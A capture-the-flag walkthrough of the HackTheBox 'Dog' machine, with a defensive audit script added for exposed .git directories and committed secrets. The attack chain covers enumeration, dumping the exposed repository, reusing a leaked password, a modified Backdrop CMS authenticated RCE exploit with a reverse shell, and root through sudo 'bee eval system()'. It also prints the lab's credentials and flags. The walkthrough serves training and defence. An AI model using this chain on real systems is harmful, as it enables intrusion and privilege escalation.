Dog
Enumeration
nmap
The first scan shows the host exposing ports 22 and 80; the port details are below:
┌──(kali㉿kali)-[~/Desktop/vegetable/HTB]
└─$ nmap -sC -sV -p 22,80 -oA nmap 10.10.11.58
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-26 03:36 EDT
Nmap scan report for 10.10.11.58
Host is up (2.3s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 (RSA)
| 256 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b (ECDSA)
|_ 256 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.md /web.config /admin
| /comment/reply /filter/tips /node/add /search /user/register
|_/user/password /user/login /user/logout /?q=admin /?q=comment/reply
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 160.93 seconds
TCP/80
Browsing the site, the CMS name shows up in the page footer: Backdrop.
Visited some of the paths nmap pulled from robots.txt.
Picked out a few that looked interesting, but found nothing useful in them.
Foothold
.git leak
Back to the CMS: searching online turned up an RCE vulnerability, but it requires authentication.
Ran a directory scanner for other possible paths and found .git.
Used the GitHack.py tool to restore and download the repository.
┌──(kali㉿kali)-[~/Desktop/vegetable/GitHack]
└─$ python GitHack.py http://10.10.11.58/.git
[+] Download and parse index file ...
[+] LICENSE.txt
[+] README.md
[+] core/.jshintignore
[+] core/.jshintrc
[+] core/authorize.php
[+] core/cron.php
[+] core/includes/actions.inc
[+] core/includes/ajax.inc
[+] core/includes/anonymous.inc
[+] core/includes/archiver.inc
When it finishes, a folder named after the IP appears.
┌──(kali㉿kali)-[~/Desktop/vegetable/GitHack]
└─$ ls
10.10.11.58 GitHack.py index lib README.md
While looking for sensitive information in that folder I found the MySQL username and password; password reuse is worth considering.
grep -i "root" 10.10.11.58
But neither SSH nor the web login accepted them. I thought about brute-forcing, but the responses were too slow. Looking at other writeups, the email addresses can be used; that is a sound idea, since the part before the @ in an email address is very likely a username elsewhere.
┌──(kali㉿kali)-[~/Desktop/vegetable/GitHack]
└─$ grep -i "@dog.htb" 10.10.11.58 -r
10.10.11.58/files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json: "tiffany@dog.htb"
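The two weaknesses used above, repository metadata served from the web root and credentials sitting in committed configuration files, are easy to catch from the defending side before anyone else does. The following audit script is an added example written for this walkthrough; it is not part of the original post, of GitHack, or of Backdrop CMS. The directory tree it builds (the config_EXAMPLE folder, the dbuser account, the placeholder password and the example.test address) is constructed for the demonstration and is not the box's real content.

```python
import json
import os
import re
import tempfile
from pathlib import Path

# Repository metadata directories that must never be reachable under a docroot.
VCS_DIRS = {".git", ".svn", ".hg", ".bzr"}

# Config keys that usually hold secrets in CMS or database settings files.
SECRET_KEY_RE = re.compile(r"(pass(word)?|secret|token|api[_-]?key)", re.IGNORECASE)

# Email addresses: the local part is frequently reused as a login name elsewhere.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def find_vcs_dirs(docroot):
    """Return every repository metadata directory found under docroot."""
    hits = []
    for root, dirs, _files in os.walk(docroot):
        for d in list(dirs):
            if d in VCS_DIRS:
                hits.append(os.path.join(root, d))
                dirs.remove(d)  # the metadata itself need not be descended into
    return sorted(hits)


def _walk(obj, prefix=""):
    """Yield (dotted key path, leaf value) pairs for a parsed JSON document."""
    if isinstance(obj, dict):
        for k, v in obj.items():
            yield from _walk(v, f"{prefix}{k}.")
    elif isinstance(obj, list):
        for i, v in enumerate(obj):
            yield from _walk(v, f"{prefix}{i}.")
    else:
        yield prefix.rstrip("."), obj


def scan_config_file(path):
    """Return (kind, detail) findings for one configuration-like text file."""
    findings = []
    text = Path(path).read_text(encoding="utf-8", errors="replace")
    # For JSON, report which key carries a secret rather than the secret itself.
    try:
        data = json.loads(text)
    except ValueError:
        data = None
    if isinstance(data, dict):
        for key, value in _walk(data):
            if SECRET_KEY_RE.search(key) and isinstance(value, str) and value:
                findings.append(("secret-key", key))
    # For any text file, list addresses whose local part may be a valid username.
    for email in set(EMAIL_RE.findall(text)):
        findings.append(("email", email))
    return findings


def audit_docroot(docroot):
    """Run both checks over a web root and return a single report dict."""
    report = {"vcs_dirs": find_vcs_dirs(docroot), "config_findings": {}}
    for root, _dirs, files in os.walk(docroot):
        for name in files:
            if name.endswith((".json", ".php", ".ini", ".yml", ".yaml")):
                full = os.path.join(root, name)
                found = scan_config_file(full)
                if found:
                    report["config_findings"][os.path.relpath(full, docroot)] = sorted(found)
    return report


def build_sample_docroot():
    """Constructed sample tree shaped like the layout the writeup describes (made-up content)."""
    root = tempfile.mkdtemp(prefix="docroot-")
    (Path(root) / ".git").mkdir()
    (Path(root) / ".git" / "HEAD").write_text("ref: refs/heads/main\n")
    cfg = Path(root) / "files" / "config_EXAMPLE" / "active"
    cfg.mkdir(parents=True)
    (cfg / "update.settings.json").write_text(json.dumps({
        "update_emails": ["someone@example.test"],           # constructed value
        "database": {"user": "dbuser", "password": "s3cret-placeholder"},  # constructed
    }))
    (Path(root) / "index.php").write_text("<?php echo 'hello'; ?>\n")
    return root


if __name__ == "__main__":
    print(json.dumps(audit_docroot(build_sample_docroot()), indent=2))
```

Run against a real docroot, a non-empty vcs_dirs list means the repository history is one HTTP request away from any visitor; the usual fixes are to deploy from a build artifact rather than a checkout, and to have the web server refuse dotfile paths outright (in Apache, a rule such as RedirectMatch 404 /\.git is a common way to do this). Any secret-key hit in a committed file should be treated as already disclosed and rotated, and because the same password may be reused across MySQL, the CMS and SSH, the rotation has to cover every place the value was used.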
Backdrop RCE
That gives a username. Trying tiffany:BackDropJ2024DS2024 logs in successfully. Exploit Database listed a vulnerability for this CMS earlier, so go straight to exploiting it.
┌──(kali㉿kali)-[~/Desktop/vegetable/HTB/Dog]
└─$ searchsploit backdrop
------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------- ---------------------------------
Backdrop CMS 1.20.0 - 'Multiple' Cross-Sit | php/webapps/50323.html
Backdrop CMS 1.23.0 - Stored XSS | php/webapps/51905.txt
Backdrop CMS 1.27.1 - Authenticated Remote | php/webapps/52021.py
Backdrop Cms v1.25.1 - Stored Cross-Site S | php/webapps/51597.txt
------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(kali㉿kali)-[~/Desktop/vegetable/HTB/Dog]
└─$ searchsploit -m php/webapps/52021.py
  Exploit: Backdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE)
      URL: https://www.exploit-db.com/exploits/52021
     Path: /usr/share/exploitdb/exploits/php/webapps/52021.py
    Codes: N/A
 Verified: True
File Type: Python script, Unicode text, UTF-8 text executable
Copied to: /home/kali/Desktop/vegetable/HTB/Dog/52021.py
Run the Python file directly to see how it is used, set the parameters as prompted, and it completes. The last two lines say: Go to http://10.10.11.58/admin/modules/install and upload the shell.zip for Manual Installation. So the generated file should be uploaded at that path, and if the upload succeeds the next line applies: Your shell address: http://10.10.11.58/modules/shell/shell.php. That path should serve the uploaded shell. Looks simple enough.
┌──(kali㉿kali)-[~/Desktop/vegetable/HTB/Dog]
└─$ python 52021.py http://10.10.11.58
Backdrop CMS 1.27.1 - Remote Command Execution Exploit
Evil module generating...
Evil module generated! shell.zip
Go to http://10.10.11.58/admin/modules/install and upload the shell.zip for Manual Installation.
Your shell address: http://10.10.11.58/modules/shell/shell.php
But the very first step ran into a problem: because of some differences in the directory structure, the upload button turned out to be at the path shown below.
Try uploading shell.zip.
A friendly message says only a fixed set of formats is accepted; that is easy to deal with.
Looking at the script that generates the payload, modify it: change every occurrence of zip in the Python code to tar, leave everything else as is, and regenerate the file the same way as before. The fifth line of output now says shell.tar was created.
┌──(kali㉿kali)-[~/Desktop/vegetable/HTB/Dog]
└─$ python exp.py http://10.10.11.58
Backdrop CMS 1.27.1 - Remote Command Execution Exploit
Evil module generating...
Evil module generated! shell.tar
Go to http://10.10.11.58/admin/modules/install and upload the shell.tar for Manual Installation.
Your shell address: http://10.10.11.58/modules/shell/shell.php
Upload the .tar file the same way; it reports success.
Visit the path given in the script's output; it works.
But this shell gets cleaned up very quickly, so first find a suitable reverse shell, assemble it, re-upload the .tar file, and visit the assembled URL straight away; the listener then receives a shell.
┌──(kali㉿kali)-[~]
└─$ nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.16.59] from (UNKNOWN) [10.10.11.58] 57888
bash: cannot set terminal process group (876): Inappropriate ioctl for device
bash: no job control in this shell
www-data@dog:/var/www/html/modules/shell$ whoami
whoami
www-data
Privilege Escalation
The current user is www-data; two users are found under the home directory.
www-data@dog:/var/www/html/modules/shell$ ls /home
jobert johncusack
Consider password reuse again: after some attempts, the earlier password logs in as johncusack. Since we now have a password, check the output of sudo -l, which lists bee.
johncusack@dog:/tmp$ sudo -l
[sudo] password for johncusack:
Matching Defaults entries for johncusack on dog:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User johncusack may run the following commands on dog:
    (ALL : ALL) /usr/local/bin/bee
Look at how bee is used (its help output, translated).
Following the steps below, commands can be executed as root.
johncusack@dog:~$ cd /var/www/html
johncusack@dog:/var/www/html$
johncusack@dog:/var/www/html$ sudo /usr/local/bin/bee eval "system('id');"
uid=0(root) gid=0(root) groups=0(root)
johncusack@dog:/var/www/html$ sudo /usr/local/bin/bee eval 'system("/bin/bash");'
root@dog:/var/www/html#
root@dog:/var/www/html# cat /home/johncusack/user.txt
7176e61dabe388fccd5a063ee57c616a
root@dog:/var/www/html# cat /root/root.txt
bd2e0207a6794f14909ddd58a1b836ea